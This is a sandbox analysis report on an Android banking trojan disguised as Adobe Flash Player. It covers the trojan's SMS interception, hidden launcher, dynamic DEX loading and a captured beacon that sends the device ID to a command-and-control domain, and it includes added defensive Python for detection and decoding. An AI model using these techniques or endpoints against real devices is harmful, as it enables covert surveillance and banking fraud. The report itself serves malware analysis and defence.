
Analysis Report AXG8PgmvaV

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:983771
Start date:24.10.2019
Start time:14:35:51
Joe Sandbox Product:Cloud
Overall analysis duration:0h 11m 58s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:AXG8PgmvaV
Cookbook file name:defaultandroidfilecookbook.jbs
Analysis system description:Android 7.1 Nougat
APK Instrumentation enabled:true
Detection:MAL
Classification:mal84.troj.spyw.evad.and@0/252@1/0
Warnings:
  • Excluded IPs from analysis (whitelisted): 216.58.215.227, 172.217.168.4, 172.217.168.10, 172.217.168.46, 172.217.168.78, 216.58.215.238, 172.217.168.14, 172.217.218.188
  • Excluded domains from analysis (whitelisted): connectivitycheck.gstatic.com, android.clients.google.com, android.l.google.com, www.google.com, www.googleapis.com, mobile-gtalk.l.google.com, mtalk.google.com
  • No interacted views
  • Not all executed log events are in report (maximum 10 identical API calls)
  • Not all non-executed APIs are in report
  • Not all non-executed methods are in report
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size exceeded maximum capacity and may have missing dynamic data code.

Detection

Strategy: Threshold
Score: 84
Range: 0 - 100
Reporting: Report FP / FN
Whitelisted: false
Threat: Ginp
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Mitre Att&ck Matrix

Signature Overview



AV Detection:

Antivirus or Machine Learning detection for sample
Source: AXG8PgmvaV | Avira: detection malicious, Label: ANDROID/Drop.Agent.xzklp
Multi AV Scanner detection for submitted file
Source: AXG8PgmvaV | Virustotal: Detection: 25%

Networking:

Opens an internet connection
Source: improve.harbor.eager.q;->run:5 | API Call: java.net.URL.openConnection("http://carnivors284.info/api3/ping.php")
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 108.177.127.188 (this event is logged 22 times in the report)
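The "TCP traffic without corresponding DNS query" signature above is a simple ordering check over a capture: every TCP destination is compared against the set of addresses that DNS answers have returned so far. The following Python is an added example written for this report, not Joe Sandbox code. Its event list is constructed to mirror the findings (carnivors284.info resolved and then contacted; the Google addresses from the "Excluded IPs" warning whitelisted; 108.177.127.188 contacted with no DNS query at all); the port numbers are assumed, since the report does not list them.

```python
"""Detection: TCP destinations that were never returned by a DNS answer.

Added example for this report, not Joe Sandbox code. SAMPLE_EVENTS is a
constructed capture; ports are assumed because the report does not give them.
"""
from collections import Counter
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Iterable, List, Tuple

# Copied from the report's "Excluded IPs from analysis (whitelisted)" warning.
WHITELISTED_IPS = frozenset({
    "216.58.215.227", "172.217.168.4", "172.217.168.10", "172.217.168.46",
    "172.217.168.78", "216.58.215.238", "172.217.168.14", "172.217.218.188",
})


@dataclass(frozen=True)
class Event:
    ts: float        # seconds since capture start
    kind: str        # "dns" (an A-record answer) or "tcp" (a SYN to a destination)
    ip: str          # answered address (dns) or destination address (tcp)
    port: int = 0    # destination port, tcp only
    name: str = ""   # queried name, dns only


def tcp_without_dns(events: Iterable[Event],
                    whitelist: frozenset = WHITELISTED_IPS) -> List[Tuple[str, int, int]]:
    """Return (ip, port, count) for TCP destinations with no earlier DNS answer.

    Order matters: a DNS answer only covers connections that follow it, so a
    hard-coded C2 address contacted before (or without) resolution is still
    reported. Whitelisted addresses are skipped, as the sandbox did.
    """
    resolved = set()
    hits: Counter = Counter()
    for ev in sorted(events, key=lambda e: e.ts):
        ip_address(ev.ip)  # reject malformed addresses early
        if ev.kind == "dns":
            resolved.add(ev.ip)
        elif ev.kind == "tcp":
            if ev.ip not in whitelist and ev.ip not in resolved:
                hits[(ev.ip, ev.port)] += 1
        else:
            raise ValueError(f"unknown event kind: {ev.kind!r}")
    return sorted((ip, port, n) for (ip, port), n in hits.items())


# Constructed sample capture mirroring the report (ports assumed).
SAMPLE_EVENTS = [
    Event(0.5, "dns", "104.27.165.230", name="carnivors284.info"),
    Event(0.6, "tcp", "104.27.165.230", 80),
    Event(0.9, "tcp", "104.27.165.230", 80),
    Event(1.2, "tcp", "216.58.215.227", 443),   # whitelisted Google address
    Event(2.0, "tcp", "108.177.127.188", 443),  # never resolved by name
    Event(2.4, "tcp", "108.177.127.188", 443),
    Event(3.0, "tcp", "104.27.165.230", 80),
]

if __name__ == "__main__":
    for ip, port, n in tcp_without_dns(SAMPLE_EVENTS):
        print(f"TCP traffic detected without corresponding DNS query: {ip}:{port} ({n}x)")
```

The whitelist is what keeps platform noise (connectivity checks, Play services) out of the result; without it the Google address would be flagged too, which is exactly why the sandbox excludes those IPs before scoring.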
Found strings which match to known social media urls
Source: classes.dex | String found in binary or memory: Lcom/facebook/login/LoginClient; equals www.facebook.com (Facebook)
Source: classes.dex | String found in binary or memory: "Lcom/facebook/login/LoginBehavior; equals www.facebook.com (Facebook)
Source: classes.dex | String found in binary or memory: $Lcom/facebook/login/DefaultAudience; equals www.facebook.com (Facebook)
Source: classes.dex | String found in binary or memory: (Lcom/facebook/login/LoginClient$Request; equals www.facebook.com (Facebook)
Source: classes.dex | String found in binary or memory: ,Lcom/facebook/login/LoginClient$Result$Code; equals www.facebook.com (Facebook)
Source: classes.dex | String found in binary or memory: Lcom/facebook/appevents/g; equals www.facebook.com (Facebook)
Source: classes.dex | String found in binary or memory: Lcom/facebook/appevents/g;$Lcom/facebook/login/DefaultAudience;"Lcom/facebook/login/LoginBehavior;(Lcom/facebook/login/LoginClient$Request;,Lcom/facebook/login/LoginClient$Result$Code; Lcom/facebook/login/LoginClient; equals www.facebook.com (Facebook)
Source: classes.dex | String found in binary or memory: Lcom/facebook/login/c; equals www.facebook.com (Facebook)
Source: classes.dex | String found in binary or memory: Lcom/facebook/login/c;?Lcomfort/BMiDsFxUiPjUoTlQmRuPySeHaEqQwGiGmUoIhRjFxAzKnBxWfQyKi;3Lcomfort/GHnGpTzJtAkHeCmMzKpEgYfUnNlIcNpZlRdGxUdLl; equals www.facebook.com (Facebook)
Source: classes.dex | String found in binary or memory: com.facebook.katana equals www.facebook.com (Facebook)
Source: DAOO.json.dr | String found in binary or memory: facebook equals www.facebook.com (Facebook)
Source: DAOO.json.dr | String found in binary or memory: twitter equals www.twitter.com (Twitter)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: carnivors284.info
Posts data to webserver
Source: unknown | HTTP traffic detected:
POST /api3/ping.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)
Host: carnivors284.info
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 219
Data Raw: 7b 22 44 45 56 49 43 45 5f 49 44 22 3a 22 62 38 65 36 38 38 62 38 37 61 62 34 31 66 39 22 2c 22 54 41 47 22 3a 22 61 64 6f 62 65 32 22 2c 22 53 4d 53 5f 41 4c 4c 4f 57 22 3a 31 2c 22 48 49 44 44 45 4e 5f 53 4d 53 5f 41 4c 4c 4f 57 22 3a 31 2c 22 43 43 5f 47 52 41 42 42 45 52 22 3a 30 2c 22 45 58 54 45 4e 44 45 44 5f 49 4e 4a 45 43 54 49 4f 4e 22 3a 30 2c 22 41 43 43 45 53 53 49 42 49 4c 49 54 59 22 3a 30 2c 22 53 43 52 45 45 4e 5f 4f 4e 22 3a 31 2c 22 49 4e 53 54 41 4c 4c 22 3a 31 2c 22 50 4b 47 5f 4e 41 4d 45 22 3a 22 61 63 63 65 73 73 2e 70 61 63 74 2e 61 67 65 6e 74 22 2c 22 52 45 4c 45 41 53 45 5f 56 45 52 53 49 4f 4e 22 3a 22 32 2e 30 64 22 7d
Data Ascii: {"DEVICE_ID":"b8e688b87ab41f9","TAG":"adobe2","SMS_ALLOW":1,"HIDDEN_SMS_ALLOW":1,"CC_GRABBER":0,"EXTENDED_INJECTION":0,"ACCESSIBILITY":0,"SCREEN_ON":1,"INSTALL":1,"PKG_NAME":"access.pact.agent","RELEASE_VERSION":"2.0d"}
(The ASCII line is the complete 219-byte body decoded from the raw bytes above. The body is a JSON object even though the Content-Type header claims application/x-www-form-urlencoded. DEVICE_ID is the Secure.ANDROID_ID value reported under "Stealing of Sensitive Information", PKG_NAME is the package that later loads the dropped DAOO.json through DexClassLoader, and the SMS_ALLOW, HIDDEN_SMS_ALLOW, CC_GRABBER, EXTENDED_INJECTION, ACCESSIBILITY, SCREEN_ON and INSTALL fields read as the bot's feature switches.)
Urls found in memory or binary data
Source: DAOO.json.dr | String found in binary or memory: http://127.0.0.1
Source: DAOO.json.dr | String found in binary or memory: http://carnivors284.info/api3
Source: android | String found in binary or memory: http://carnivors284.info/api3/ping.php
Source: dynload.xml | String found in binary or memory: http://schemas.android.com/apk/res/android
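The check-in to /api3/ping.php is only printed as a hex dump with a truncated ASCII rendering, so a practitioner bulk-processing such reports needs to decode it. The Python below is an added example, not Joe Sandbox code: REQUEST_TEXT reproduces the request as the report prints it, and the parser reads Content-Length, decodes the hex, verifies the length, and parses the body as JSON, falling back to form decoding only if the body is not JSON (the Content-Type header here claims a form body and is wrong). Field meanings are inferred from their names only.

```python
"""Decode the ping.php check-in body shown in this report.

Added example, not Joe Sandbox code. REQUEST_TEXT is the report's own HTTP
evidence; flag names are interpreted only by their spelling.
"""
import json
from typing import Dict
from urllib.parse import parse_qs

REQUEST_TEXT = """POST /api3/ping.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)
Host: carnivors284.info
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 219
Data Raw: 7b 22 44 45 56 49 43 45 5f 49 44 22 3a 22 62 38
65 36 38 38 62 38 37 61 62 34 31 66 39 22 2c 22
54 41 47 22 3a 22 61 64 6f 62 65 32 22 2c 22 53
4d 53 5f 41 4c 4c 4f 57 22 3a 31 2c 22 48 49 44
44 45 4e 5f 53 4d 53 5f 41 4c 4c 4f 57 22 3a 31
2c 22 43 43 5f 47 52 41 42 42 45 52 22 3a 30 2c
22 45 58 54 45 4e 44 45 44 5f 49 4e 4a 45 43 54
49 4f 4e 22 3a 30 2c 22 41 43 43 45 53 53 49 42
49 4c 49 54 59 22 3a 30 2c 22 53 43 52 45 45 4e
5f 4f 4e 22 3a 31 2c 22 49 4e 53 54 41 4c 4c 22
3a 31 2c 22 50 4b 47 5f 4e 41 4d 45 22 3a 22 61
63 63 65 73 73 2e 70 61 63 74 2e 61 67 65 6e 74
22 2c 22 52 45 4c 45 41 53 45 5f 56 45 52 53 49
4f 4e 22 3a 22 32 2e 30 64 22 7d
"""


def parse_sandbox_request(text: str) -> Dict[str, object]:
    """Split a Joe Sandbox style request dump into request line, headers and raw body."""
    head, sep, raw = text.partition("Data Raw:")
    if not sep:
        raise ValueError("no 'Data Raw:' section in request text")
    raw = raw.split("Data Ascii:", 1)[0]          # ignore the (possibly truncated) ASCII view
    lines = head.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    body = bytes.fromhex("".join(raw.split()))
    declared = int(headers.get("content-length", len(body)))
    if declared != len(body):
        raise ValueError(f"Content-Length {declared} != decoded body of {len(body)} bytes")
    return {"request_line": lines[0], "headers": headers, "body": body}


def decode_body(body: bytes, content_type: str) -> Dict[str, object]:
    """Try JSON first regardless of Content-Type; fall back to form decoding."""
    text = body.decode("utf-8")
    try:
        parsed = json.loads(text)
    except json.JSONDecodeError:
        if "x-www-form-urlencoded" not in content_type:
            raise
        pairs = parse_qs(text, strict_parsing=True)
        return {k: v[0] if len(v) == 1 else v for k, v in pairs.items()}
    if not isinstance(parsed, dict):
        raise ValueError("beacon body is not a JSON object")
    return parsed


def summarize_beacon(beacon: Dict[str, object]) -> Dict[str, object]:
    """Pull identity fields and split integer fields into enabled/disabled switches."""
    flags = {k: v for k, v in beacon.items() if isinstance(v, int) and not isinstance(v, bool)}
    return {
        "device_id": beacon.get("DEVICE_ID"),
        "tag": beacon.get("TAG"),
        "package": beacon.get("PKG_NAME"),
        "version": beacon.get("RELEASE_VERSION"),
        "enabled": sorted(k for k, v in flags.items() if v),
        "disabled": sorted(k for k, v in flags.items() if not v),
    }


def analyse(text: str = REQUEST_TEXT) -> Dict[str, object]:
    req = parse_sandbox_request(text)
    beacon = decode_body(req["body"], req["headers"].get("content-type", ""))
    return summarize_beacon(beacon)


if __name__ == "__main__":
    print(json.dumps(analyse(), indent=2))
```

The length check matters: a hex dump that is shorter than Content-Length means the report clipped the body, and any conclusion drawn from the decoded fields would be drawn from a partial message.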

E-Banking Fraud:

Detected Ginp e-Banking trojan loader
Source: Limprove/harbor/eager/MainServiceJob;->b()V | Method string: Ginp strings
Has permission to query the list of currently running applications
Source: submitted apk | Request permission: android.permission.GET_TASKS
May query for the most recent running application (usually for UI overlaying)
Source: improve.harbor.eager.AccessibilityWatcher$1;->run | getRunningTasks and getPackageName invocations in same method: improve.harbor.eager.AccessibilityWatcher$1;->run:10, improve.harbor.eager.AccessibilityWatcher$1;->run:13

Spam, unwanted Advertisements and Ransom Demands:

Has permission to send SMS in the background
Source: submitted apk | Request permission: android.permission.SEND_SMS
Has permission to write to the SMS storage
Source: submitted apk | Request permission: android.permission.WRITE_SMS
Sends SMS using SmsManager
Source: improve.harbor.eager.MainServiceJob;->a:10 | API Call: android.telephony.SmsManager.sendTextMessage

Change of System Appearance:

Acquires a wake lock
Source: improve.harbor.eager.AccessibilityS;->onServiceConnected:394 | API Call: android.os.PowerManager$WakeLock.acquire

System Summary:

Requests to ignore battery optimizations
Source: Limprove/harbor/eager/Permissions;->d(Landroid/content/Context;)V | Method string: "android.settings.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"
Requests potentially dangerous permissions
Source: submitted apk | Request permission: android.permission.CHANGE_NETWORK_STATE
Source: submitted apk | Request permission: android.permission.GET_TASKS
Source: submitted apk | Request permission: android.permission.INTERNET
Source: submitted apk | Request permission: android.permission.MODIFY_AUDIO_SETTINGS
Source: submitted apk | Request permission: android.permission.READ_CONTACTS
Source: submitted apk | Request permission: android.permission.READ_PHONE_STATE
Source: submitted apk | Request permission: android.permission.READ_SMS
Source: submitted apk | Request permission: android.permission.RECEIVE_SMS
Source: submitted apk | Request permission: android.permission.SEND_SMS
Source: submitted apk | Request permission: android.permission.SYSTEM_ALERT_WINDOW
Source: submitted apk | Request permission: android.permission.WAKE_LOCK
Source: submitted apk | Request permission: android.permission.WRITE_EXTERNAL_STORAGE
Source: submitted apk | Request permission: android.permission.WRITE_SMS
Classification label
Source: classification engine | Classification label: mal84.troj.spyw.evad.and@0/252@1/0
Reads shared settings
Source: improve.harbor.eager.g;->a:10 | API Call: "ANDROID_ID":
Source: improve.harbor.eager.g;->a:10 | API Call: "SERVER_SMS_URL":
Source: improve.harbor.eager.g;->a:10 | API Call: "SERVER_IP": http://carnivors284.info/api3
Source: improve.harbor.eager.g;->a:10 | API Call: "SERVER_PING_URL": http://carnivors284.info/api3/ping.php
Source: improve.harbor.eager.g;->a:10 | API Call: "ANDROID_ID": b8e688b87ab41f9
Source: improve.harbor.eager.g;->a:10 | API Call: "APP_TAG": adobe2
Source: improve.harbor.eager.g;->a:10 | API Call: "RELEASE_VERSION": 2.0d
Source: improve.harbor.eager.g;->a:10 | API Call: "APP_NAME": Adobe Flash Player

Data Obfuscation:

Obfuscates method names
Source: AXG8PgmvaV | Total valid method names: 1%
Uses reflection
Source: access.pact.agent.XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->wisecement:53 | API Call: Real call: null
Source: access.pact.agent.XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->wisecement:53 | API Call: Real call: public static android.app.ActivityThread android.app.ActivityThread.currentActivityThread()
Source: access.pact.agent.XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->reportmargin:44 | API Call: Real call: final android.util.ArrayMap android.app.ActivityThread.mPackages
Source: access.pact.agent.XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->casualpattern:18 | API Call: Real call: private java.lang.ClassLoader android.app.LoadedApk.mClassLoader
Source: access.pact.agent.DSyXdSaQaAqMbHiYhRnUmEqIrFcYhDhRcStJiMu;->produceanchor_sub:76 | API Call: java.lang.reflect.Method.invoke
Source: access.pact.agent.DSyXdSaQaAqMbHiYhRnUmEqIrFcYhDhRcStJiMu;->sheriffcruise:79 | API Call: java.lang.reflect.Field.get
Source: access.pact.agent.DSyXdSaQaAqMbHiYhRnUmEqIrFcYhDhRcStJiMu;->thispanther:80 | API Call: java.lang.reflect.Field.get
Source: improve.harbor.eager.receivers.DownloadReceiver;->onReceive:22 | API Call: java.lang.reflect.Method.invoke

Persistence and Installation Behavior:

Tries to get accessibility permissions (for UI automation)
Source: improve.harbor.eager.SettingsActivity;->onCreate:28 | API Call: improve.harbor.eager.SettingsActivity.startActivity

Boot Survival:

Has permission to execute code after phone reboot
Source: submitted apk | Request permission: android.permission.RECEIVE_BOOT_COMPLETED
Installs a new wake lock (to stay active with the phone screen on)
Source: improve.harbor.eager.AccessibilityS;->onServiceConnected:390 | API Call: android.os.PowerManager.newWakeLock
Starts/registers a service/receiver on phone boot (autostart)
Source: improve.harbor.eager.receivers.MainReceiver;->onReceive:52 | API Call: android.content.Context.startService (not executed)
Source: improve.harbor.eager.receivers.MainReceiver;->onReceive:53 | API Call: android.content.Context.startService (not executed)

Hooking and other Techniques for Hiding and Protection:

Removes its application launcher (likely to stay hidden)
Source: improve.harbor.eager.PreActivity;->a:18 | API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Source: improve.harbor.eager.AccessibilityWatcher;->onDestroy:55 | API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Has permission to draw over other applications or user interfaces
Source: submitted apk | Request permission: android.permission.SYSTEM_ALERT_WINDOW
Has permission to query the list of currently running applications
Source: submitted apk | Request permission: android.permission.GET_TASKS
Queries list of running processes/tasks
Source: improve.harbor.eager.AccessibilityWatcher$1;->run:10 | API Call: android.app.ActivityManager.getRunningTasks

Malware Analysis System Evasion:

Queries the unique operating system id (ANDROID_ID)
Source: improve.harbor.eager.PreActivity;->onCreate:124 | API Call: android.provider.Settings.Secure.getString

Anti Debugging:

Access the class loader (often done to load new code)
Source: access.pact.agent.XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->trashvoid:47 | API Call: java.lang.Class.getDeclaredField("mClassLoader")
Source: Laccess/pact/agent/XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->replaceClassUnit(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V | Method string: "mClassLoader"
Source: Laccess/pact/agent/XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->trashvoid(Ljava/lang/Class;Ljava/lang/String;)Ljava/lang/reflect/Field; | Method string: "mClassLoader"
Source: Laccess/pact/agent/XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->fleedawn()Ljava/lang/String; | Method string: "mClassLoader"

HIPS / PFW / Operating System Protection Evasion:

Uses the DexClassLoader (often used for code injection)
Source: access.pact.agent.XNxDmOoDwPrCuPwKtNqExHyIwAnNnQxJpNmRxAcRrFdKjYnFtGr;->drillrhythm:20 | API Call: dalvik.system.DexClassLoader.<init>("/data/user/0/access.pact.agent/app_DynamicOptDex/DAOO.json")
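The payload handed to DexClassLoader is named DAOO.json, so any triage that sorts dropped files by extension would file it as configuration data. The Python below is an added example, not Joe Sandbox code: it classifies files by magic bytes and validates the two DEX header fields the runtime itself checks (the Adler-32 checksum over everything after it, and file_size), so a dropped file is recognised as loadable code whatever it is called. The files it scans are constructed in a temporary directory (a fake header-only DEX named DAOO.json, a genuine JSON file, and an ELF stub named notes.txt); the ELF and JSON contents are made up for the demonstration.

```python
"""Find loadable code hiding behind harmless file names.

Added example, not Joe Sandbox code. demo() builds a constructed sample tree
(fake DEX as DAOO.json, real JSON, ELF stub as notes.txt) and scans it.
"""
import json
import re
import struct
import tempfile
import zlib
from pathlib import Path
from typing import Dict, List

DEX_HEADER_SIZE = 0x70
DEX_MAGIC = re.compile(rb"\Adex\n\d{3}\x00")   # dex\n035\0, dex\n039\0, ...
CODE_SUFFIXES = {".dex", ".odex", ".oat", ".so", ".apk", ".jar", ".zip"}


def classify(head: bytes) -> str:
    """Identify a file by its leading bytes, ignoring its name."""
    if DEX_MAGIC.match(head):
        return "dex"
    if head.startswith(b"dey\n"):
        return "odex"
    if head.startswith(b"\x7fELF"):
        return "elf"
    if head.startswith(b"PK\x03\x04"):
        return "zip"          # APK and JAR are ZIP containers
    return "other"


def dex_header_ok(data: bytes) -> bool:
    """Check the checksum (Adler-32 over bytes 12..end) and file_size header fields."""
    if len(data) < DEX_HEADER_SIZE or not DEX_MAGIC.match(data):
        return False
    checksum, = struct.unpack_from("<I", data, 8)
    file_size, = struct.unpack_from("<I", data, 32)
    return file_size == len(data) and (zlib.adler32(data[12:]) & 0xFFFFFFFF) == checksum


def scan(root: Path) -> List[Dict[str, object]]:
    """Report files whose content is code but whose extension does not say so."""
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        data = path.read_bytes()
        kind = classify(data[:8])
        if kind == "other" or path.suffix.lower() in CODE_SUFFIXES:
            continue
        findings.append({
            "name": path.name,
            "kind": kind,
            "valid_dex": dex_header_ok(data) if kind == "dex" else None,
        })
    return findings


def build_fake_dex(version: bytes = b"035", payload: bytes = b"") -> bytes:
    """Constructed minimal DEX: header plus optional padding, with consistent size and checksum."""
    hdr = bytearray(DEX_HEADER_SIZE) + bytearray(payload)
    hdr[0:8] = b"dex\n" + version + b"\x00"
    hdr[32:36] = struct.pack("<I", len(hdr))          # file_size
    hdr[36:40] = struct.pack("<I", DEX_HEADER_SIZE)   # header_size
    hdr[40:44] = struct.pack("<I", 0x12345678)        # endian_tag (little endian)
    hdr[8:12] = struct.pack("<I", zlib.adler32(bytes(hdr[12:])) & 0xFFFFFFFF)
    return bytes(hdr)


def demo() -> List[Dict[str, object]]:
    """Create the constructed sample tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "app_DynamicOptDex").mkdir()
        (root / "app_DynamicOptDex" / "DAOO.json").write_bytes(build_fake_dex(payload=b"\0" * 16))
        (root / "settings.json").write_text(json.dumps({"SERVER_IP": "http://127.0.0.1"}))
        (root / "notes.txt").write_bytes(b"\x7fELF" + b"\0" * 60)
        return scan(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

A file that carries the DEX magic but fails the header check is still worth a look: packers and loaders sometimes fix the checksum up in memory, and a mismatch on disk is itself a signal.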

Stealing of Sensitive Information:

Uploads sensitive phone information to the internet (privacy leak)
Source: 192.168.1.92:54824 -> 104.27.165.230:80 | HTTP traffic detected: Header contains sensitive information: b8e688b87ab41f9 (Secure.ANDROID_ID) (3 identical events)
Source: 192.168.1.92:54826 -> 104.27.165.230:80 | HTTP traffic detected: Header contains sensitive information: b8e688b87ab41f9 (Secure.ANDROID_ID)
Creates SMS data (e.g. PDU)
Source: improve.harbor.eager.sms.IncomingSmsListener;->onReceive:30 | API Call: android.telephony.SmsMessage.createFromPdu
Has permission to read contacts
Source: submitted apk | Request permission: android.permission.READ_CONTACTS
Has permission to read the SMS storage
Source: submitted apk | Request permission: android.permission.READ_SMS
Has permission to read the phone's state (phone number, device IDs, active call etc.)
Source: submitted apk | Request permission: android.permission.READ_PHONE_STATE
Has permission to receive SMS in the background
Source: submitted apk | Request permission: android.permission.RECEIVE_SMS
Monitors incoming SMS
Source: improve.harbor.eager.sms.IncomingSmsListener | Registered receiver: android.provider.Telephony.SMS_RECEIVED
Parses SMS data (e.g. originating address)
Source: improve.harbor.eager.sms.IncomingSmsListener;->onReceive:31 | API Call: android.telephony.SmsMessage.getOriginatingAddress
Source: improve.harbor.eager.sms.IncomingSmsListener;->onReceive:32 | API Call: android.telephony.SmsMessage.getMessageBody
Queries SMS data
Source: improve.harbor.eager.MainServiceJob;->h:184 | API Call: android.net.Uri.parse("content://sms/")
Queries a list of installed applications
Source: improve.harbor.eager.MainServiceJob;->d:37 | API Call: android.content.pm.PackageManager.getInstalledApplications
Queries phone contact information
Source: improve.harbor.eager.MainServiceJob;->g:102 | Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI

Remote Access Functionality:

Found parser code for incoming SMS (may be used to act on incoming SMS, BOT)
Source: improve.harbor.eager.sms.IncomingSmsListener;->onReceive:26 | API Call: java.lang.String.equals android.provider.Telephony.SMS_RECEIVED
Found suspicious command strings (may be related to BOT commands)
Source: Limprove/harbor/eager/j;->a(Ljava/lang/String;)Ljava/lang/String; | Method string: "hidden sms started"
Source: Limprove/harbor/eager/MainServiceJob;->b()V | Method string: "get_contacts"
Source: Limprove/harbor/eager/Permissions;->a(Landroid/content/Context;)Z | Method string: "android.permission.send_sms"
Source: Limprove/harbor/eager/j;->a(Ljava/lang/String;)Ljava/lang/String; | Instruction: "const-string v2, "hidden sms started""
Source: Limprove/harbor/eager/MainServiceJob;->b()V | Instruction: "const-string v2, "get_contacts""
Source: Limprove/harbor/eager/Permissions;->a(Landroid/content/Context;)Z | Instruction: "const-string v2, "android.permission.send_sms""
Uses DownloadManager to fetch additional components
Source: improve.harbor.eager.Installer;->onCreate:51 | API Call: android.app.DownloadManager.enqueue

Signature Similarity

Sample Distance (10 = nearest, scale 10 down to 1)
Samplename | Analysis ID | SHA256 | Similarity
(no similar samples listed)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
AXG8PgmvaV | 26% | Virustotal | -
AXG8PgmvaV | 100% | Avira | ANDROID/Drop.Agent.xzklp

Dropped Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
carnivors284.info | 0% | Virustotal | -

URLs

Source | Detection | Scanner | Label
http://127.0.0.1 | 0% | Virustotal | -
http://127.0.0.1 | 0% | Avira URL Cloud | safe
http://carnivors284.info/api3 | 0% | Avira URL Cloud | safe
http://carnivors284.info/api3/ping.php | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
108.177.127.188 (all associated samples detected malicious; hashes and context available in Joe Sandbox):
  • downloadMe.apk
  • AntiVirus_com.antivirus.apk
  • AapgMZnJUb
  • fwa5d2ukPS
  • i2vKzz91dR
  • GVfg1uSjXe.apk
  • Cy740jc5PS
  • NxdkwWqZQm.apk
  • aVEMRt6TYi
  • 2tOzBnOY5Z
  • 6MgH0XSp33
  • connect_test
  • com.filtershekanha.teledr_571_apkplz.net.apk
  • DpPCix7fdW.apk
  • rc0nWeTOKU
  • com.cootek.smartinputv5_2019-06-06.apk
  • GQjDNGfQnb
  • yT6XDEfEZM
  • cpb.apk
  • cYdkwkn884

Domains

No context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
unknown (all associated samples detected malicious; hashes and context available in Joe Sandbox), with the address each sample contacted:
  • DETAILS-24102019-P6818.doc (166.62.6.39)
  • FA_36802305641_Oct2019.doc (192.168.2.255)
  • RFQ- PURCHASE ORDER 270MT JEBEL ALI.doc (23.20.239.12)
  • RFQ - NEW PURCHASE ORDER.doc (192.168.2.255)
  • 3b#U0448.exe (195.123.220.115)
  • info_10_22.doc (192.168.2.255)
  • https://estudiogalt.com/HOULIHANLOKEY/ (157.240.20.35)
  • info_10_24.doc (194.87.111.66)
  • https://ausbuildproltd.com/ (79.134.225.70)
  • pt6HoCUEGz.exe (195.123.220.115)
  • Statement.pdf (3.3.0.2)
  • Swift_MT103_-USD_550000_Settlement.xls (104.22.3.84)
  • VwX1UeLBjq.exe (190.13.160.19)
  • Swift_MT103_-USD_550000_Settlement.xls (104.22.3.84)
  • Swift_MT103_-USD_550000_Settlement.xls (104.22.3.84)
  • Payment.doc (104.28.28.20)
  • IT54985044967641616345156438179559489126089863741.vbs (185.189.151.22)
  • f.ra.000070031.doc (8.209.83.211)
  • bonny (1).pdf (3.3.0.2)
  • M9HYn2QYu6.exe (23.23.83.153)

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails (images not included in this text rendering; the report shows all screenshots as thumbnails, including those not shown in the slideshow).